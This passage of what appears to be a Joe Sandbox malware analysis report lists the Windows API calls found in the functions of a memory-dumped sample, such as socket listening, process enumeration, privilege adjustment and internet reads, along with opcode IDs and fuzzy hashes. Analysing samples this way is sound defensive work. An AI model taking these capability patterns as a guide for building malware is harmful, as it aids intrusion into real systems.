                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279440585-0
                                                                                                                                                                                                                                                      • Opcode ID: e490d61479b55a528a67864f299ffc0bfd907789322a7fb72a621612f0a1362e
                                                                                                                                                                                                                                                      • Instruction ID: 5c729da1bde5349f4693ebb31760d744549b8a9480ed72a983985d06fb0e1636
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e490d61479b55a528a67864f299ffc0bfd907789322a7fb72a621612f0a1362e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2521E4356002059FCB14EF68DE45BAEB7E9EF59360F10415CF916A73D2CB30AD42AB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F06554
                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F06564
                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F06583
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F065A7
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F065BA
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F065F9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1605983538-0
                                                                                                                                                                                                                                                      • Opcode ID: 088fde006004de28ab5e24e32a8d4000e2b16c6eb2d706ff1788d401ebb10460
                                                                                                                                                                                                                                                      • Instruction ID: e0325e5f0001c9e015c1b8032ba22927673709078351c8aa560bebdfb8509a0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 088fde006004de28ab5e24e32a8d4000e2b16c6eb2d706ff1788d401ebb10460
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65218671A00258ABDB20ABA4CC88BEDB7FCAB45310F5400A5E905E3181DB719F85EB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F1A82C: inet_addr.WSOCK32(00000000), ref: 00F1A84E
                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00F19296
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00F192B9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4170576061-0
                                                                                                                                                                                                                                                      • Opcode ID: 8568d24f5f30a4e0aff6088dca55876c1d99ab9cfc6ba4f3d2daaf3b55ba4db0
                                                                                                                                                                                                                                                      • Instruction ID: 1ce9eb4e7d7a57cc94ed185a4e68b0df55b9387f69a831541b73c2d09931f149
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8568d24f5f30a4e0aff6088dca55876c1d99ab9cfc6ba4f3d2daaf3b55ba4db0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7841DD70600204AFDB14AB688D92F7EB7EDEF44324F14854DF956AB3C2CBB49D029B91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F0EB8A
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0EBBA
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0EBCF
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F0EBE0
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F0EC0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2387731787-0
                                                                                                                                                                                                                                                      • Opcode ID: c935dc77693641daae3f0a14181bf1ec99e7644c5f9b56a01dba32dec6990a6a
                                                                                                                                                                                                                                                      • Instruction ID: e446d1fcfbab8a08b3946a2d0acf4c0f0b0bbdc8e3ed7179865bb46ef0275ef1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c935dc77693641daae3f0a14181bf1ec99e7644c5f9b56a01dba32dec6990a6a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD41D275604302DFD708DF28C490A9AB3E4FF49324F10495EEA5A8B3A1DB32E945EB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                                                                                                      • Opcode ID: 98233bb829e0d792b640d7ed0203e2793db1baafff68de3bbdc003ad9acbb4fa
                                                                                                                                                                                                                                                      • Instruction ID: 60c4ce364242dba5e5f186ecf5bd09af909a82583e49a9dbeba57eb36a69c2a4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98233bb829e0d792b640d7ed0203e2793db1baafff68de3bbdc003ad9acbb4fa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF11B2317011256FE7216F26EC44F6FBB9CEF557A0B05042DF949D7281CF34A913A6A1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                                                                                                                                      • API String ID: 0-1546025612
                                                                                                                                                                                                                                                      • Opcode ID: 1c40e2814f4855b2bd978e2f37df1093032e20f6446dc6a2b530c46a3d3e5347
                                                                                                                                                                                                                                                      • Instruction ID: 528cd7443d57f6fe34db38e9cdfafd07e62f678b9f53c4455589c4afb978e917
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c40e2814f4855b2bd978e2f37df1093032e20f6446dc6a2b530c46a3d3e5347
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA92BF71E01219CBDF24CF58C980BFDB7B1BB54318F1891AAE816B7281D7729D82DB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00EDE014,74DF0AE0,00EDDEF1,00F5DC38,?,?), ref: 00EDE02C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EDE03E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                                                                                                                                                      • Opcode ID: fbe2c42c66e8a4a9e3e29328f3fd3d4f7b230c6a03d5778fc1a0f8c23810e8ae
                                                                                                                                                                                                                                                      • Instruction ID: b60a87093560fae27af954fe878fb0df522f13dfde5fd61ef6aabc4e7ee138ed
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbe2c42c66e8a4a9e3e29328f3fd3d4f7b230c6a03d5778fc1a0f8c23810e8ae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CD0A7345007129FD7315F60EC0C61276D4EB11308F18841BEC85E2350D7B4CC81D761
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F013DC
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                                                                                      • String ID: ($|
                                                                                                                                                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                                                                                                                                                      • Opcode ID: 3d5bdf7b7523c3eb2c748cd8578b95e5628dec473e4129c928a40f681472e333
                                                                                                                                                                                                                                                      • Instruction ID: ff758d22b79f389eadf63cbba409b11d405c238c095f2dc218388e9277178bff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d5bdf7b7523c3eb2c748cd8578b95e5628dec473e4129c928a40f681472e333
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C322475A007059FCB28CF69C480A6AB7F0FF48320B15C56EE49ADB3A2E770E941DB44
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00EDB22F
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00EDB5A5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Proc$LongWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2749884682-0
                                                                                                                                                                                                                                                      • Opcode ID: 77df11707267e470a246b19e101e6b545033e0b6c5cbadb83f53f91a5e98275d
                                                                                                                                                                                                                                                      • Instruction ID: 770fe612955677772d02ce590a58dd35da9ae707e26026ee4ff0f8ae207ac50f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77df11707267e470a246b19e101e6b545033e0b6c5cbadb83f53f91a5e98275d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAA12661514005FEDA28AA699C88EBF396CEF56364F16522FF441F63E1FB149C03B272
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F143BF,00000000), ref: 00F14FA6
                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F14FD2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 599397726-0
                                                                                                                                                                                                                                                      • Opcode ID: b49060730eb77749763ad4bc79080adaa98770649adb59fb56ad944b75ab5b55
                                                                                                                                                                                                                                                      • Instruction ID: 4ce21896602f6ebd2caae34737ea6cac8ad670cb2663928ded593b10ce13c218
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b49060730eb77749763ad4bc79080adaa98770649adb59fb56ad944b75ab5b55
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9241B77290460AFFEB20DE94DC85FFB77BCEB80764F10402EF60567281D671AE85A690
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F0E20D
                                                                                                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F0E267
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F0E2B4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1682464887-0
                                                                                                                                                                                                                                                      • Opcode ID: b1fbac41b751decdeed042f654b315805cfcca932379b8f98769a5c6bd39ba71
                                                                                                                                                                                                                                                      • Instruction ID: 3d55003b9d048545992c9b3aade8e043266b764e02627a619bc3309274197d1a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1fbac41b751decdeed042f654b315805cfcca932379b8f98769a5c6bd39ba71
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2214A35A00118EFCB00EFA5D984AADFBF8FF99314F0484AAE905A7391DB319906DB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDF4EA: std::exception::exception.LIBCMT ref: 00EDF51E
                                                                                                                                                                                                                                                        • Part of subcall function 00EDF4EA: __CxxThrowException@8.LIBCMT ref: 00EDF533
                                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EFB180
                                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EFB1AD
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EFB1BA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1922334811-0
                                                                                                                                                                                                                                                      • Opcode ID: 981e0b9b3b1766ab6ee469eb8e590d44bb4e08970f9c0a825cfa4fc90aba33af
                                                                                                                                                                                                                                                      • Instruction ID: 89e1b891c7066c021c91ce7539f9b1268c3c3f0187c6714ebe5a6f83613309c4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 981e0b9b3b1766ab6ee469eb8e590d44bb4e08970f9c0a825cfa4fc90aba33af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F1191B1504209AFE718EF54DCD5D6BB7FDFB44714B20852EE556A7240DB70FC418A60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F066AF
                                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00F066EC
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F066F5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 33631002-0
                                                                                                                                                                                                                                                      • Opcode ID: 6ec0707c9b1dbc477f629b5512ec9fc06496e5d6aa251dd534108188dcaa80e6
                                                                                                                                                                                                                                                      • Instruction ID: 31d1bf859c31b1a8bcb2c325fa1dc429acef9ab12da99bb20ee1bb8cdcebd6d4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ec0707c9b1dbc477f629b5512ec9fc06496e5d6aa251dd534108188dcaa80e6
